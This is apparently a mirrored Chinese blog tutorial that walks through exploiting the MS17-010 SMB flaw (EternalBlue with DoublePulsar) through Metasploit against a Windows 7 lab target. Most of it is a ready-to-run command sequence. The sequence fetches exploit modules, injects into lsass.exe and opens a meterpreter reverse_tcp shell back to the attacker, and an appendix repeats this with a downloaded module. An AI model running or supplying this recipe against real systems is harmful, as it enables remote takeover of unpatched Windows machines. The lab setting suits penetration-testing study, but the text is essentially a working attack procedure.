zoukankan      html  css  js  c++  java
  • smb(ms17-010)远程命令执行之msf

    本次用到的环境:

    kali(2016.2)32位系统.ip地址:192.168.1.104

    目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

    具体的步骤如下:

    kali系统下安装wine32:

    apt-get install wine32 

     

     

    用wine32执行cmd.exe

    wine cmd.exe

     

    exit        //退出

     

     git  clone下载其利用脚本:

    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

    然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

    cd    Eternalblue-Doublepulsar-Metasploit/
    cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

     

    启动msf,然后进行一系列设置:

    service postgresql start
    msfconsole

     

     

    search  eternalblue
    use exploit
    /windows/smb/eternalblue_doublepulsar

     

     set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
    
      set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
    
    set PROCESSINJECT   lsass.exe
    
    set TARGETARCHITECTURE  x64
    
    set rhost  192.168.1.105
    
    show targets
    
    set target 9
    
    set payload windows/x64/meterpreter/reverse_tcp
    
    show options
    
    set lhost 192.168.1.104
    
    exploit

     

     

    附录:

    msf下的ms17-010模块:

    前提条件:

    1. gem install ruby_smb #ruby_smb模块安装

    2.msfupdate   #msf的更新

    3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

    root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
    
    root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
    
    Use exploit/windows/smb/ms17_010_eternalblue
    
    msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
    
    msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
    
    msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
    
    msf exploit(ms17_010_eternalblue) >exploit
    
    Meterpreter> sysinfo

     

     

     

     

  • 相关阅读:
    [校内模拟赛T3]火花灿灿_二分答案_组合数学_贪心
    [loj#539][LibreOJ NOIP Round #1]旅游路线_倍增_dp
    [loj#2005][SDOI2017]相关分析 _线段树
    [bzoj3162]独钓寒江雪_树hash_树形dp
    [bzoj2746][HEOI2012]旅行问题 _AC自动机_倍增
    [bzoj2597][Wc2007]剪刀石头布_费用流
    [bzoj4818][Sdoi2017]序列计数_矩阵乘法_欧拉筛
    vue中的组件传值
    vue中的修饰符
    箭头函数递归斐波那契数列
  • 原文地址:https://www.cnblogs.com/backlion/p/6804863.html
Copyright © 2011-2022 走看看